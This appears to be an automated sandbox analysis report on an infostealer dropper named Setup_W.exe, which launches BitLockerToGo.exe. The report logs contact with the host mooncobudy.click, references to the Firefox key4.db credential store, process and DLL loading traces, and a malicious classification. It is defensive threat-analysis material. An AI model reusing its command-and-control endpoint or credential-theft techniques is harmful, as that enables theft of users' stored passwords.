              Source: BitLockerToGo.exe, 00000004.00000002.2293779528.000000000329A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292404891.0000000003286000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2293085450.0000000003299000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click/t
              Source: BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2145909317.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063109527.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169622819.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2145537455.0000000003261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click:443/api
              Source: BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2169622819.0000000003261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click:443/api2o4p.default-release/key4.dbPK
              Source: BitLockerToGo.exe, 00000004.00000002.2293687502.0000000003261000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2292724484.0000000003261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mooncobudy.click:443/apiPeYB
              Source: BitLockerToGo.exe, 00000004.00000003.2064540383.00000000055B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
              Source: BitLockerToGo.exe, 00000004.00000003.2114890767.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: BitLockerToGo.exe, 00000004.00000003.2114890767.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: BitLockerToGo.exe, 00000004.00000003.2091097029.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064825714.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2090974461.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064629217.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064540383.00000000055AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: BitLockerToGo.exe, 00000004.00000003.2064629217.0000000005583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
              Source: BitLockerToGo.exe, 00000004.00000003.2091097029.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064825714.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2090974461.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064629217.00000000055A8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2064540383.00000000055AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: BitLockerToGo.exe, 00000004.00000003.2064629217.0000000005583000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
              Source: BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: BitLockerToGo.exe, 00000004.00000003.2064014887.000000000559A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2063864587.000000000559C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: BitLockerToGo.exe, 00000004.00000003.2114890767.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: BitLockerToGo.exe, 00000004.00000003.2114890767.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: BitLockerToGo.exe, 00000004.00000003.2114890767.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: BitLockerToGo.exe, 00000004.00000003.2114890767.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: BitLockerToGo.exe, 00000004.00000003.2114890767.0000000005679000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownHTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.44.57:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_646053ED glfwGetClipboardString,OpenClipboard,GetClipboardData,CloseClipboard,CloseClipboard,GlobalLock,CloseClipboard,free,GlobalUnlock,CloseClipboard,0_2_646053ED
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_64605394 glfwSetClipboardString,MultiByteToWideChar,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_64605394
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_646053ED glfwGetClipboardString,OpenClipboard,GetClipboardData,CloseClipboard,CloseClipboard,GlobalLock,CloseClipboard,free,GlobalUnlock,CloseClipboard,0_2_646053ED
              Source: Setup_W.exeBinary or memory string: PFN_DirectInput8Create
              Source: C:\Users\user\Desktop\Setup_W.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\dinput8.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_6460BA76 RegisterRawInputDevices,0_2_6460BA76
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_6460B019 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_6460B019

              System Summary

              barindex
              Source: 00000000.00000002.2014689557.000000000A100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_032E217A4_3_032E217A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_032E217A4_3_032E217A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_032E16524_3_032E1652
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_032E16524_3_032E1652
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_03296A294_3_03296A29
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_03296A294_3_03296A29
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_0329686F4_3_0329686F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_0329686F4_3_0329686F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_0328E7524_3_0328E752
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_0328E7524_3_0328E752
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_03296A294_3_03296A29
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_03296A294_3_03296A29
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_0329686F4_3_0329686F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_0329686F4_3_0329686F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_0328E7524_3_0328E752
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_0328E7524_3_0328E752
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_032E217A4_3_032E217A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_032E217A4_3_032E217A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_032E16524_3_032E1652
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_032E16524_3_032E1652
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_03296A294_3_03296A29
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_03296A294_3_03296A29
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_0329686F4_3_0329686F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_0329686F4_3_0329686F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_0328E7524_3_0328E752
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_0328E7524_3_0328E752
              Source: glfw.4281411633.dll.0.drStatic PE information: Number of sections : 17 > 10
              Source: Setup_W.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: 00000000.00000002.2014689557.000000000A100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@1/1
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_64608298 LoadImageW,GetLastError,FormatMessageW,WideCharToMultiByte,0_2_64608298
              Source: C:\Users\user\Desktop\Setup_W.exeFile created: C:\Users\user\AppData\Local\Temp\glfw.4281411633.dllJump to behavior
              Source: Setup_W.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Setup_W.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: BitLockerToGo.exe, 00000004.00000003.2064710626.0000000005555000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Setup_W.exeVirustotal: Detection: 64%
              Source: Setup_W.exeReversingLabs: Detection: 47%
              Source: Setup_W.exeString found in binary or memory: net/addrselect.go
              Source: Setup_W.exeString found in binary or memory: github.com/hajimehoshi/ebiten@v1.12.12/internal/glfw/load_windows.go
              Source: C:\Users\user\Desktop\Setup_W.exeFile read: C:\Users\user\Desktop\Setup_W.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Setup_W.exe "C:\Users\user\Desktop\Setup_W.exe"
              Source: C:\Users\user\Desktop\Setup_W.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              Source: C:\Users\user\Desktop\Setup_W.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: dinput8.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: xinput1_4.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: inputhost.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: hid.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25E609E4-B259-11CF-BFC7-444553540000}\InProcServer32Jump to behavior
              Source: Setup_W.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: Setup_W.exeStatic file information: File size 32077826 > 1048576
              Source: Setup_W.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x257000
              Source: Setup_W.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x26e200
              Source: Setup_W.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_64608848 SystemParametersInfoW,KiUserCallbackDispatcher,SystemParametersInfoW,LoadLibraryA,SystemParametersInfoW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDpiAwarenessContext,SetProcessDPIAware,GetModuleHandleW,CreateWindowExW,ShowWindow,RegisterDeviceNotificationW,PeekMessageW,TranslateMessage,DispatchMessageW,0_2_64608848
              Source: Setup_W.exeStatic PE information: section name: .symtab
              Source: glfw.4281411633.dll.0.drStatic PE information: section name: /4
              Source: glfw.4281411633.dll.0.drStatic PE information: section name: /19
              Source: glfw.4281411633.dll.0.drStatic PE information: section name: /31
              Source: glfw.4281411633.dll.0.drStatic PE information: section name: /45
              Source: glfw.4281411633.dll.0.drStatic PE information: section name: /57
              Source: glfw.4281411633.dll.0.drStatic PE information: section name: /70
              Source: glfw.4281411633.dll.0.drStatic PE information: section name: /81
              Source: glfw.4281411633.dll.0.drStatic PE information: section name: /92
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_64608848 push ecx; mov dword ptr [esp], 64631695h0_2_64608A19
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_64608848 push esi; mov dword ptr [esp], 646316DBh0_2_64608A75
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_64608848 push esi; mov dword ptr [esp], 6463170Eh0_2_64608AB8
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_6460C519 push eax; mov dword ptr [esp], 00003839h0_2_6460C7F6
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_646094CB push ecx; mov dword ptr [esp], eax0_2_6460969D
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_646094CB push edx; mov dword ptr [esp], eax0_2_6460974A
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_6460B169 push ebx; mov dword ptr [esp], esi0_2_6460B1BB
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_6460B26A push ecx; mov dword ptr [esp], eax0_2_6460B46F
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_6460BA29 push edx; mov dword ptr [esp], eax0_2_6460BA62
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_6460DEEC push esi; mov dword ptr [esp], ebx0_2_6460DF4E
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_6460B6B7 push eax; mov dword ptr [esp], 00003839h0_2_6460B703
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_6460737C push esi; mov dword ptr [esp], ebx0_2_6460755C
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_6460737C push ecx; mov dword ptr [esp], ebx0_2_646076B0
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_6460AB26 push eax; mov dword ptr [esp], edi0_2_6460AB76
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_6460AB26 push edx; mov dword ptr [esp], ebx0_2_6460AB80
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_64601B16 push eax; mov dword ptr [esp], ebx0_2_64601EB5
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_6460ABC8 push eax; mov dword ptr [esp], esi0_2_6460AC76
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_64605394 push ecx; mov dword ptr [esp], eax0_2_6460E36D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_032F208E pushad ; iretd 4_3_032F208F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_032EBF00 pushad ; ret 4_3_032EBF01
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_032F3570 push 0000004Dh; retn 0043h4_3_032F3572
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_032E2E00 pushad ; retf 4_3_032E2E01
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_032E2E00 pushad ; retf 4_3_032E2E01
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_0328D883 push 780328C9h; retf 4_3_0328D88D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_0328D883 push 780328C9h; retf 4_3_0328D88D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_032DE9D1 push ss; retf 4_3_032DE9D2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_032DE9D1 push ss; retf 4_3_032DE9D2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_032DE9D1 push ss; retf 4_3_032DE9D2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_032DE9D1 push ss; retf 4_3_032DE9D2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_0328D883 push 780328C9h; retf 4_3_0328D88D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_3_0328D883 push 780328C9h; retf 4_3_0328D88D
              Source: C:\Users\user\Desktop\Setup_W.exeFile created: C:\Users\user\AppData\Local\Temp\glfw.4281411633.dllJump to dropped file
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_6460CD2B IsIconic,0_2_6460CD2B
              Source: C:\Users\user\Desktop\Setup_W.exeCode function: 0_2_64608848 SystemParametersInfoW,KiUserCallbackDispatcher,SystemParametersInfoW,LoadLibraryA,SystemParametersInfoW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDpiAwarenessContext,SetProcessDPIAware,GetModuleHandleW,CreateWindowExW,ShowWindow,RegisterDeviceNotificationW,PeekMessageW,TranslateMessage,DispatchMessageW,0_2_64608848
              Source: C:\Users\user\Desktop\Setup_W.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Setup_W.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
